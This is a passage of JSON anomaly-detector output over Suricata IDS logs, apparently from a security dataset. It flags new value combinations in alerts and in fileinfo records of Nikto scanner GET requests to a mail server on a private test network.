"03/04/2020-19:18:34.246745 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46860 -> 192.168.10.154:80", "/parser/model/time": 1583349514.246745, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46860, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.246745 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46860 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.nl", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.246933+0000\",\"flow_id\":1913111561551927,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46860,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.246933, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1913111561551927,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46860,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46860,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.nl\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.nl\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.nl", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.nl", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46860,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46860, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1913111561551927,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1913111561551927, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.246933+0000\",\"flow_id\":1913111561551927,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46860,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.249275 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46862 -> 192.168.10.154:80", "/parser/model/time": 1583349514.249275, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46862, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.249275 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46862 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA\\/", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.249681+0000\",\"flow_id\":201554209196080,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46862,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.249681, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":201554209196080,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46862,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46862,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA\\/\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA\\/\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA\\/", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA\\/", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46862,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46862, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":201554209196080,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 201554209196080, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.249681+0000\",\"flow_id\":201554209196080,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46862,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.251198 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46864 -> 192.168.10.154:80", "/parser/model/time": 1583349514.251198, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46864, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.251198 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46864 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.SMAIL893", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.251429+0000\",\"flow_id\":1038059219636916,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46864,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.SMAIL893\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.SMAIL893\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.251429, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1038059219636916,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46864,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.SMAIL893\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.SMAIL893\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46864,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.SMAIL893\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.SMAIL893\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.SMAIL893\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.SMAIL893\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.SMAIL893", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.SMAIL893", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46864,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46864, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1038059219636916,", "/parser/model/flow_id/flow_id/flow_id_str": 